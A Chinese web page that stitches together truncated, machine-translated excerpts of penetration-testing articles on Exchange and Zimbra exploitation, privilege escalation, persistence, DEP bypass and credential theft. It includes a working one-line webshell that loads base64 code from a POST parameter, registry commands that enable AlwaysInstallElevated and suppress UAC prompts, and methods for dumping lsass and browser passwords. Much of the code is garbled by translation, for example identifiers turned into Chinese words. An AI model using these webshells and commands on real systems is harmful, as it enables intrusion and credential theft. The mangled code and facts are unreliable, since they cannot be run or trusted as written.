WEB和服务器安全漏洞

0x00 前言 在上篇文章《Zimbra漏洞调试环境搭建》 提到了通过反射枚举JspServletWrapper实例的实现，本文将要以此为例，详细介绍实现的思路和细节，便于以此类推，实现其他功能。 0x01 简介 本文将要介绍以下内容： 反射中的常用操作 获得类的所有字段 获得类的所有方法 调用类的方法 枚举JspServletWrapper实例的实现细节 0x02 反射中的常用操作 1.获得类的所有字段 getField(): 能够获取本类以及父类中的公众的字段 getDeclaredField(): 能够获取本类中的所有字段 这里以津布拉环境为例，给出示例代码 (1)获取request对象的所有字段 %@个页面导入='java.lang.reflect.Field' % % Field[] fields=request.getClass().getDeclaredFields()； for(int I=0；我字段。长度；i ) { out.println(fields[i].getName()' '); } % (2)获取request对象的父类的所有字段 %@个页面导入='java.lang.reflect.Field' % % Field[] fields=request.getClass().getSuperclass().getDeclaredFields()； …

0x00 前言 Orange在今年的BlackHat演讲中介绍了Pwn2Own 2021上使用的微软Exchange攻击链，他分享的东西给了我很大的启发。 本文仅从技术研究的角度记录我对ProxyShell的研究细节，并分析利用的思路。 0x01 简介 本文将介绍以下内容： 调试环境建设 漏洞分析 利用理念 0x02 调试环境搭建 1.禁用Visual Studio中的调试优化 设置环境变量COMPLUS_ZapDisable=1 重启系统 2.查看Exchange中对应的进程 执行命令： c:\ Windows \ System32 \ inetsrv \ app cmd list WP 您可以获得Exchange的所有进程和对应的pid，如下图所示。 3.使用dnSpy进行调试 打开相关的dll文件，在要调试的位置中断断点，并选择附加进程开始调试。 如果您不确定要调试的交换过程，您可以选择所有w3wp.exe。 0x03 漏洞调试 使用dnSpy打开文件c:\ program files \ Microsoft \ exchange server \ v15 \ frontend \ http proxy \ bin \ Microsoft.exchange.frontendhttpproxy.dll 导航到Microsoft . exchange . clients . OWA . core-Microsoft . exc…

0x00 前言 使用AlwaysInstallElevated提升功率是2017年公开的技术，Metasploit和PowerUp都提供了利用方法。 在我的研究过程中，发现Metasploit的利用方法存在一些不足，我遇到了与其他公开文章中描述的不同的情况。 于是我做了进一步的研究，这篇文章将介绍我遇到的问题和解决方法。 0x01 简介 本文将介绍以下内容： 常规利用方法 我在测试中遇到的问题 解决办法 扩展思想 0x02 常规利用方法 AlwaysInstallElevated是一个组策略配置。如果启用，它将允许普通用户以系统权限运行安装文件(msi)。 启用方法： 需要修改以下两个组策略： 计算机配置\管理模板\Windows组件\Windows Installer 用户配置\管理模板\Windows组件\Windows Installer 设置为启用，如下图所示 注： 不能通过secedit.exe在命令行下修改上述两个组策略。 命令行下的启用方法： 创建以下两个注册表项： HKCU \软件\策略\Microsoft\Windows\Installer，AlwaysInstallElevated，1 HKLM \软件\策略\Microsoft\Windows\Installer，AlwaysInstallElevated，1 cmd的命令如下： REG add HKCU \软件\策略\ Micros…

0x00 前言 在之前的文章《Use Office to maintain persistence》中，在Office中介绍过 常见的在软件中嵌入后门的方法，但不全面，缺乏64位系统的测试。至于64位操作系统，支持32位和64位版本的office软件。不同版本的office有不同的使用方法吗？本文将给出答案。 0x01 简介 本文将介绍以下内容： 如何在64位系统中安装64位办公软件 如何在64位系统中安装32位办公软件 根据测试结果优化概念验证 0x02 64位系统安装64位Office软件的利用方法 测试系统：Win8 x64 开发工具：vs2012 注： 在32位系统下安装vs2012支持生成64位dll 默认主文件安装目录：c:\ program files \ Microsoft office 1、Word WLL 32位dll，无法加载 64位dll，已成功加载 2、Excel XLL 32位dll，无法加载 64位dll，已成功加载 注： 添加导出函数xlAutoOpen的方法： 1、使用传统的模块定义文件 (.def) 在不选择“导出符号”的情况下创建新的dll项目。 如下图 添加一个同名文件。包含以下内容的def: 出口 xlAutoOpen 如下图 编译成dll，用IDA查看导出函数。 显示正常 如下图 2、使用vs2012提…

0x00前言 对于Windows系统来说，用户的加密数据大多是通过DPAPI来存储的，如果要解密这些数据方案，就必须获取DPAPI对应的MasterKey。本文将介绍获得Windows系统权限后获取MasterKey的方法，并分析延长MasterKey有效期的首选文件格式。 0x01 简介 本文将介绍以下内容 基本概念 获得主密钥的方法 解析首选文件 修改主密钥过期时间 0x02 基本概念 DPAPI： 数据保护应用程序编程接口的全名 它被广泛用作Windows系统的数据保护接口。 主要用于保护加密数据，常见应用如： EFS文件加密 存储无线连接密码 Windows凭据管理器 微软公司出品的web浏览器 观点 网络电话 Windows CardSpace Windows保管库 谷歌浏览器 Master Key： 64字节，用于解密DPAPI blob，用用户登录密码、SID和16字节随机数加密，存储在主密钥文件中。 Master Key file： 二进制文件，可由用户登录密码解密以获得主密钥。 有两种类型： 位于% appdata % \ Microsoft \ protect \ % sid %的用户主密钥文件 主密钥文件，位于% windir % \ system32 \ Microsoft \ protect \ s-1-5-18 \ user中 Prefer…

0x00 前言 在上一篇文章《渗透基础——Exchange一句话后门的实现》 介绍了两种交换一句话后门（内存加载。网程序集和文件写入),本文将要对交换一句话后门的功能进行扩展，以导出lsass进程的口令混杂为例，介绍内存加载体育课文件的实现方法，开源测试代码，分析利用思路，给出防御建议。 0x01 简介 本文将要介绍以下内容： 交换一句话后门的编写 通过内存加载。网程序集实现导出lsass.exe进程的dmp文件 通过内存加载体育课文件实现内存加载米米卡茨并解析指定位置的dmp文件 开源代码 防御建议 0x02 Exchange一句话后门的编写 (1)基本的实现代码 示例代码如下： %@ Page Language='C#' %%System .反射。汇编。加载（转换FromBase64String(请求。表格['demodata']).CreateInstance("有效负载")。等于("");% 代码会判断是否带有邮政请求的参数蠕形螨，如果存在会将邮政请求中参数蠕形螨的内容作base64解密，在内存加载并调用名为有效载荷的实例 (2)冰蝎的实现代码 默认启动代码如下： % @ Page Language=' c# ' % % @ Import Namespace=' System .反射"% %会话"。Add('k '，' e45e 329 feb 5d 925 b ')；字节[] k=编码默认。GetBytes(会话[0]' ')，c=请求Binary…

0x00 前言 之前的文章《渗透技巧——导出Chrome浏览器中保存的密码》介绍了导出Chrome浏览器密码的原理和使用方法。本文将介绍导出Firefox浏览器密码的原理和使用方法，并分析使用思路。 0x01 简介 本文将介绍以下内容： 密码存储模式 原理介绍 常用的导出工具 利用理念 0x02 密码保存方式 用户在正常访问网站时，可以选择使用火狐浏览器保存登录密码，供火狐下次登录时自动填写登录密码。 可以通过选择登录名和密码来查看，如下图所示。 包括以下信息： 网站地址 用户名 密码 创造 上次修改时间 上次使用 所有记录都保存在同一个文件中，具体位置是：% appdata % \ Mozilla \ Firefox \ profiles \

0x00 前言 在渗透测试中，尤其是内网渗透，通常需要在内网打开一个匿名访问的文件共享来配合漏洞利用。 所以我们需要一个通用的方法，不仅简单易用，而且可以在命令行下运行。 0x01 简介 本文将介绍以下内容： 使用场景 通过界面以匿名访问方式打开文件共享服务器。 通过命令行以匿名访问方式打开文件共享服务器。 开放源代码 0x02 利用场景 打开支持匿名访问的文件共享后，其他用户可以直接访问文件服务器的共享文件，无需输入用户名和密码。 通常有以下两种用法： 作为数据传输的通道。 配合开发，作为有效载荷的下载地址。 文件共享服务器需要建立在不同的操作系统上。 对于Linux系统，可以使用Samba服务来构建匿名文件共享服务器。 以下是Kali系统下的使用方法： 修改文件/etc/samba/smb.conf，如下所示： [全球] 映射到guest=test1 服务器角色=独立服务器 用户共享允许来宾=是 idmap配置*:后端=tdb smb端口=445 [中小企业] 评论=桑巴 path=/tmp/ 游客ok=是 只读=否 可浏览=是 开放服务： 服务smbd启动 服务nmbd启动 对于Windows系统，需要考虑域环境和工作组环境。要支持匿名访问，您需要打开访客用户，并允许访客用户访问文件共享服务器的内容。 0x03 通过界面开启可匿名访…

0x00 前言 在Linux系统下，用户的密码将被加密并存储在文件/etc/shadow中。密码的加密方法和破解方法有哪些？本文试着对这部分进行梳理，介绍基础知识，测试常用方法，帮助你对此有更直观的认识。 0x01 简介 本文将介绍以下内容： Linux下用户密码的保存格式 Linux下用户密码的加密方法 破解用户密码哈希的常用工具和方法 0x02 Linux下用户密码的保存格式 Linux密码信息保存在两个文件中：/etc/passwd和/etc/shadow。 /etc/passwd: 普通用户权限可以查看 保存用户信息，每行代表一个用户，每行用冒号分成七个部分： 用户名 密码，x表示密码保存在/etc/shadow中。 UID，0代表根 GID，表示组。 描述，其次是全名，房间号，工作电话，家庭电话和其他。 用户目录 默认外壳类型 eg. test2:x:1001:1001:test2，11111，111111-11，222222-22，test:/home/test2:/bin/bash 用户名：test2 密码保存在/etc/shadow中。 UID是1001 GID是1001 描述信息： 全名[]:测试2 房间号[]: 11111 工作电话[]: 111111-11 住宅电话[]: 222222-22 其他[]:测试 用户目录是/home/test2。…

0x00 前言 Pupy在Windows平台下的后期穿透模块包含了一个实用的功能：屏幕控制。该功能不仅可以查看屏幕内容，还可以发送鼠标和键盘消息。本文将对该功能的实现方法进行分析，寻找另一种方式实现类似的功能，便于二次开发。 0x01 简介 本文将介绍以下内容： 皮氏屏幕控制模块测试 Pupy的实现方法 另一种实现方法 0x02 Pupy的屏幕控制模块测试 Pupy的基本用法可以参考前面的文章《Pupy利用分析——Windows平台下的功能》。 获取会话后，进入rdesktop加载屏幕控制模块，如下图所示 浏览器可以通过访问url来查看和操作屏幕，如下图所示 这里支持输入键盘消息和鼠标点击。 用普通用户权限操作时注意UAC的问题(UAC的弹匣不能操作)。 当consent.exe驱逐UAC时，将会创建一个进程。 您需要系统权限来关闭此进程。关闭后会弹出一个对话框提示存储控制块地址无效。 如下图 注： Cmd命令关闭UAC项目符号框提示： REG add HKLM \软件\微软\ Windows \当前版本\策略\系统/v consentpromptbhavioradmin/t REG _ DWORD/d 0/f Cmd命令打开UAC弹出提示： REG add HKLM \软件\微软\ Windows \当前版本\策略\系统/v consentpromptbhavioradmin/t REG _ DWORD…

0x00 前言 剪贴板是Windows系统中的一个常用功能。里面可以用什么？本文将尝试对这一部分进行梳理。 0x01 简介 本文将介绍以下内容： 书写剪贴板的方法 一种读取剪贴板的方法 利用理念 0x02 剪贴板简介 剪贴板是指windows操作系统提供的用于临时存储和共享数据的模块，可以理解为数据中转站。 剪贴板的内容保存在内存中，所以系统重启后保存的数据会丢失。 XP系统支持剪贴板查看器clipbrd.exe(win 7后移除)，可以查看剪贴板内容。 剪贴板查看器clipbrd.exe不需要安装，但可以直接在其他系统中使用(如Win7)。 复制数据后，复制的内容将实时显示在剪贴板查看器clipbrd.exe中，如下图所示 0x03 写入剪贴板的方法 1、Ctrl+C 复制数据，或使用快捷键Ctrl C将数据保存到剪贴板。 2、cmd下的方法 将whoami输出的内容复制到剪贴板： whoami |剪辑 如下图 将11.txt的内容复制到剪贴板： 剪辑11.txt 如下图 3、程序调用API实现 c测试代码如下： #包括 BOOL CopyToClipboard(char * PSZ data) { if(:OpenClipboard(NULL)) { * EmptyClipboard()； HGLOBAL剪辑缓冲区； char *缓冲区； c…

0x00 前言 维基解密公布的CIA Vault 7涉及Windows系统中Junction文件夹和库文件的使用。 地址如下： https://wikileaks.org/ciav7p1/cms/page_13763381.html https://wikileaks.org/ciav7p1/cms/page_13763373.html 郑对此进行了分析，分享了一种库文件的后门利用方法，并详细介绍了如何检测结文件夹和库文件的恶意利用。 地址如下： https://www . counter cept . com/blog/hunting-for-junction-folder-persistence/ https://www . counter cept . com/blog/abiling-windows-library-files-for-persistence/ 本文将在以上参考资料的基础上，对比Junction文件夹和库文件，进一步利用库文件的后门利用方式(隐蔽性更强)，开源一个POC，分享自己对检测的理解。 0x01 简介 本文将介绍以下内容： 连接文件夹的利用方法 图书馆档案的利用方法 文件后门的进一步利用 检测和识别 0x02 Junction Folders的利用方法 Junction Folders可以简单理解为一个可以跳转到另一个位置的文件夹。 三种常见的创建方法： 修改注册表项 修改文件夹中的desk…

0x00 前言 前面两篇文章《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》和《Authenticode签名伪造——针对文件类型的签名伪造》介绍了Authenticode签名伪造的方法。这次介绍一种目录签名伪造的方法，利用长UNC文件名欺骗系统，获取系统内置的目录签名。 注： 本文介绍的技巧参考了Matt Graeber@mattifestation发布的资料。本文将结合自身经历，梳理相关内容，补充个人理解。 参考资料： http://www . exploit-Monday . com/2013/02/windows file confusion . html？m=1 0x01 简介 本文将介绍以下内容： 长UNC基础 长UNC文件名欺骗方法 龙分析利弊龙UNC文件名欺骗 0x02 Long UNC介绍 UNC（Universal Naming Convention） 通用命名规则，可用于指示文件在Windows系统中的位置。 详情请参考以下链接： https://en . Wikipedia . org/wiki/Path _(计算) Long UNC UNC通常支持的最大长度是260个字符 为了支持更长的字符，引入了长UNC，最大长度为32767。 例如：\ \？\C:\test\a.exe 键入putty.exe ' \ \？\C:\test\longUNC.exe ' 如下图，使用长UNC的文件…

0x00 前言 接着介绍DEP绕过的另一种方法——利用虚拟分配绕过离开通过虚拟分配函数可以申请一段具有可执行属性的内存，相比于虚拟保护，传入虚拟分配的四个参数不需要先读取再赋值，可在外壳代码中直接指定，结构更简单。当然，利用抗干扰调试器的白腹长尾猴插件可自动构造利用虚拟分配绕过DEP的光栅化处理单元链。 0x01 简介 本文将要介绍以下内容： 调用虚拟分配函数时的病菌及修复 选择合适的替代指令，修改白腹长尾猴自动生成的钻进速度(渗透率的缩写)链，实现利用 利用虚拟分配绕过DEP时需要考虑的细节，如对外壳代码的长度要求 0x02 相关概念 VirtualAlloc: LPVOID WINAPI VirtualAlloc( LPVOID lpAddress， SIZE_T dwSize， DWORD flAllocationType， DWORD flProtect ) 慢转的地址：申请内存区域的地址 dwSize:申请内存区域的大小 flAllocationType:申请内存的类型 flProtect:申请内存的访问控制类型 申请成功时函数返回申请内存的起始地址，申请失败时返回空 0x03 实际测试 测试环境： 测试系统：Win 7 编译器：VS2012 建设版本：发布 项目属性： 关闭（美国联邦政府职员)总表(总进度表) 关闭优化 关闭圣伊丽莎白医院 打开DEP …

0x00 前言 在域环境中，域用户的凭证是非常重要的信息。为了增强安全性，域组策略将设置所有域用户密码的最大有效时间，并强制用户在过期时间后更改密码。 在实际环境中，有些域用户需要设置自己的密码永不过期，可以通过添加密码永不过期属性来实现。 在域渗透中，我们需要枚举密码永不过期的域用户，我们还需要能够设置密码永不过期的域用户。 从防御的角度来看，我们需要尽量减少密码永不过期的域用户的数量，我们还需要能够实时掌握域用户的列表。 因此，本文将介绍不同条件下枚举、添加和删除密码永不过期属性的多种方法、分析原理和开源代码。 0x01 简介 本文将介绍以下内容： 实现原则 枚举密码设置为永不过期的用户。 指定向用户添加“密码永不过期”属性的方法。 为用户指定删除“密码永不过期”属性的方法。 0x02 实现原理 域用户的密码永不过期属性保存在域用户的userAccountControl属性中。 userAccountControl属性由一个数字表示，它是几个特定属性的值的总和。 每个特定属性对应一个不同的值。请参考：https://support . Microsoft . com/en-us/help/305144/how-to-use-user account control-to-manipulate-user-account-properties。 下面是一个例子： 用户test1的userAccountControl属性的值为514，因此该用…

0x00 前言 之前的文章《域渗透——Pass The Hash Pass The Key》介绍了kb2871997对Pass Hash的影响。本文将从另一个角度介绍传递Hash的相关实现。 0x01 简介 本文将介绍以下内容： 传递散列的原理 常用工具 在mimikatz中传递散列 在米米卡茨通过票 0x02 Pass The Hash的原理 你可以参考维基百科的介绍，地址如下： https://en.wikipedia.org/wiki/Pass_the_hash 提取关键信息： 在Windows系统上，通常使用NTLM身份验证。 NTLM认证不使用明文密码，而是使用密码加密的哈希值，哈希值由系统API(例如LsaLogonUser)生成 哈希分为LM哈希和NT哈希。如果密码长度大于15，则无法生成LM哈希。对于Windows Vista和Windows Server 2008，默认情况下，Microsoft禁用了LM哈希。 如果攻击者得到了哈希，他就可以在身份验证时模拟用户(即跳过调用API生成哈希的过程)。 注： Mimikatz支持导出内存中用户的LM哈希，但前提是Windows系统支持LM哈希。 Windows Server 2008启用LM哈希的方法； Gpedit.msc-计算机配置-Windows设置-安全设置-本地策略-安全选项 查找网络安全：下次不要更改密码存储局域网管理器的哈希值，选择禁用。 …

0x00 前言 在最近的BlackHat Europe 2017上，塔尔利伯曼和尤金科岗推出了一种新的代码注入技术，——过程兴奋剂。 据说这种方法支持所有Windows系统，可以绕过大部分安全产品的检测。 因此，本文将根据开源代码编写程序，实现进程复制，测试功能，分析利用思路。 参考地址： https://www . black hat . com/docs/eu-17/materials/eu-17-liber man-Lost-In-Transaction-Process-doppelganing . pdf 0x01 简介 本文将介绍以下内容： 原则 开放源代码 修复方法 实物试验 利用理念 防御探测 0x02 Process Doppelgnging原理 原理上类似于工艺镂空，但更高级： 不需要傀儡过程。 不需要特殊的内存操作，如SuspendProcess和NtUnmapViewOfSection。 注： 工艺镂空的介绍请参考之前的文章《傀儡进程的实现与检测》。 实现思路： 1.打开一个正常文件，创建transaction 对于NTFS交易，请参考： http://www.ntfs.com/transaction.htm 2.在这个transaction内填入payload，payload作为进程被启动 目前为止，杀毒软件无法扫描填充的有效载荷。 3.回滚transaction …

0x00 前言 在上篇文章《渗透基础——端口转发与代理》 提到了使用去语言分别实现正向和反向袜子代理的方法，不仅开发效率高，而且能够很方便的实现跨平台编译。 本文将要进一步介绍Windows操作系统操作系统系统和迦利系统下使用去语言开发的完整过程，并基于开源代码，实现一个袜子正向和反向代理的工具，记录细节。 0x01 简介 本文将要介绍以下内容： Windows操作系统操作系统系统下去语言开发环境的搭建 迦利系统下去语言开发环境的搭建 工具代码细节 开源完整实现代码 0x02 Windows系统下Go语言开发环境的搭建 测试系统：Win7x64 1、安装Go 下载安装： https://golang.org/dl 或者 https://studygolang.com/dl 2、安装git https://gitforwindows.org/ 用来下载第三方开发包 0x03 代码实现与Windows系统下的跨平台编译 1、安装第三方包 需要以下三个： golang.org/x/net/context https://github.com/armon/go-socks5 https://github.com/hashicorp/yamux 安装流程如下： (1)安装golang.org/x/net/context 足球比赛5依赖，否则安装时会提示： go \ src \ github。com \ …

0x00 前言 最近，詹姆斯福肖开发了一个工具DotNetToJScript，它可以加载。Net程序的JS/Vbs脚本。这很有趣。 Casey Smith和Cn33liz都对此做了进一步的研究，并开放了他们的使用代码。 本文将对该技术进行系统梳理，帮助您有更好的了解。 0x01 简介 本文将介绍以下内容： DotNetToJScript的编译方法 DotNetToJScript的用法 用JS/Vbs执行外壳代码 使用JS/Vbs执行powershell脚本 0x02 DotNetToJScript编译方法 DotNetToJScript下载地址： https://github.com/tyranid/DotNetToJScript 使用工具VS2012编译。 报错1： 程序集引用NDesk。缺少选项。 解决方法： 您需要添加对NDesk的引用。选择 下载地址： http://www.ndesk.org/Options 解压，项目-添加引用-浏览-\ n磁盘-选项-0 . 2 . 1 . bin \ n磁盘-选项-0 . 2 . 1 . bin \ lib \ n磁盘-选项\ ndesk.options.dll。 接下来，将目标框架指定为。NET Frameword 2.0并重新编译。 报错2： 缺少程序集引用Linq 解决方法： 添加对System.Core.dll 3.5的引用 位置： c:…

0x00 前言 在渗透测试中，经常需要更改程序启动的权限(包括提升和降低权限)。 权限提升包括从普通用户权限到管理员权限和从管理员权限到系统权限。在渗透测试中，权限缩减通常是指从系统权限缩减为普通用户权限(从管理员权限缩减为普通用户权限的方式有很多种)，常用于操作当前用户的文件内容(如抓取桌面、操作注册表等)。). 本文将介绍减少权限(从系统权限到普通用户权限)的具体方法，明确重点，开启一个判断进程权限的小工具。 0x01 简介 本文将介绍以下内容： 为什么要降低功率？ 将管理员权限降为普通用户权限的方法 将系统权限降为普通用户权限的方法 使用SelectMyParent实现权限的提升和降低 注： 测试系统：Win7 0x02 为什么要降权 使用系统权限的进程可能会遇到以下问题： 1、无法获得当前用户的文件内容 例如，无法捕获用户的屏幕。 2、环境变量有差异 例如以下环境变量： APPDATA 临时雇员 终端监督程式（Terminal Monitor Program的缩写） 用户域 用户名 用户配置文件 Cmd可以通过echo查看环境变量，比如查看环境变量APPDATA的命令是： 回显%appdata% 在系统权限下，查询到的环境变量APPDATA是c:\ windows \ system32 \ config \ system profile \ APPDATA \ roaming。 …